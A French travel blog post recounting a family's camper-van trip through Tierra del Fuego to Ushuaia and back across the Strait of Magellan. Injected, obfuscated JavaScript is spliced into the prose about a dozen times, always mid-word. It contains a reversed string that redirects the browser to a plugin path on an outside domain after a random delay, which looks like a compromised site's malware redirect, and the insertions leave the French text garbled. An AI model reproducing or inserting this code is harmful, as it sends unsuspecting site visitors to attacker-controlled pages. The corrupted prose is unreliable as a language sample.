Terre de feu, un bout du monde

by Ben

Le vent souffle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours très fort quand nous passons le détroit de Magellan. Sur le ferry, on nous interdit d’aller dehors, trop dangereux, nous ne verrons donc pas grand chose de cet endroit dont nous avons tant entendu parler. Un instant on imagine Magellan et sa flotte de coquilles de noix s’aventurer dans ces terres inconnues et dans ces conditions…

Bienvenue en Terre de Feu !

Les kilomètres s’enchainent péniblement. Dehors des milliers de moutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons peuplent ces paysages plats et quasi désertiques. Nous passerons la nuit à l’abri relatif du poste frontière Argentin. Kyu, notre cycliste voyageur Chilo-Coréen, restera avec nous jusqu’à Ushuaia. Le vent est vraiment trop violent pour qu’il puisse continuer son voyage seul.

A 150Km d’Ushuaia, le vent diminue, le soleil nous fait la gentillesse de se montrer et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout, enfin, nos premières vraies montagnes. Même la route se met à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourner, on a droit à un virage en épingle, rahh quel pied !!! Les 7500 Km de plaines, de champs et de lignes droites précédents rendent cette arrivée sur Ushuaïa mémorable.

Nous laissons Kyu parcourir le monde en lui souhaitant des jours beaucoup moins venteux et en prenant rendez-vous dans 3 ou 4 ou peut-être 5 ans quand il passera en France.

En sortant son vélo du camping-car, un “magnifique semi rigide Trek 820” 🙂 j’ai une petite pensée pour Jean-Mi et Charly et leurs nouvelles montures !!!

Le temps est clément, nous n’avons pas de mal pour trouver de bons endroits pour dormir et on a même la 3G !!! Nous nous sentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons bien à Ushuaia. Aprés avoir passé 4 jours à randonner dans le parc naturel et flâner dans la ville, nous nous décidons à partir quand nous croisons deux familles françaises qui voyagent aussi en camping-car. Les enfants et les adultes s’entendent vite bien, finalement nous resterons deux jours de plus au bout du monde. Nicolas, l’un des papa, offrira à Clément une canne à pêche faite main et prendra toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le temps nécessaire pour lui donner des conseils sur les techniques de pêche. Tout le monde remarquera les étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles dans ses yeux, à ce moment précis il n’y a pas un enfant plus heureux !!!! Merci encore les « Suiveurs d’Etoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles »!!!

Quelques voyageurs nous avait mis en garde sur l’intérêt et la beauté d’Ushuaia. Le village n’est parait t’il pas beau. Pour nous l’intérêt d’Ushuaia ne réside pas dans la beauté de son urbanisme, ni seulement dans ce panneau “Fin del Mundo”. Avec ses 90 000 habitants cela fait bien longtemps qu’Ushuaïa n’est plus un village et puis dans l’ensemble du pays, l’urbanisme n’est pas vraiment une priorité pour les Argentins. Le parc naturel Terra del Fuego est magnifique et pour nous ces paysages sont remplis d’histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toires (anciennes ou pas) incroyables.

Nous prenons en stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top Ariana et Alejandro des musiciens qui travaillent l’été austral en Argentine et l’autre été en Europe. Leurs jolies chansons nous accompagneront un peu plus loin que la frontière Chilienne où nos routes se séparent. Cette fois-ci, c’est avec une mer d’huile que nous retraversons le détroit de Magellan. Le capitaine nous laisse monter dans la cabine de pilotage, il nous expliquera le fonctionnement du bateau. Les enfants sont impressionnés par le nombre de boutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons, d’écrans, de radar, etc… et nous pensons beaucoup au cousin Martin qui doit certainement trouver ce ferry petit et pas très interressant… Dans l’eau des petits dauphins de Comerson jouent dans les vagues du bateau, on quitte maintenant la Terre de feu pour rejoindre les Andes.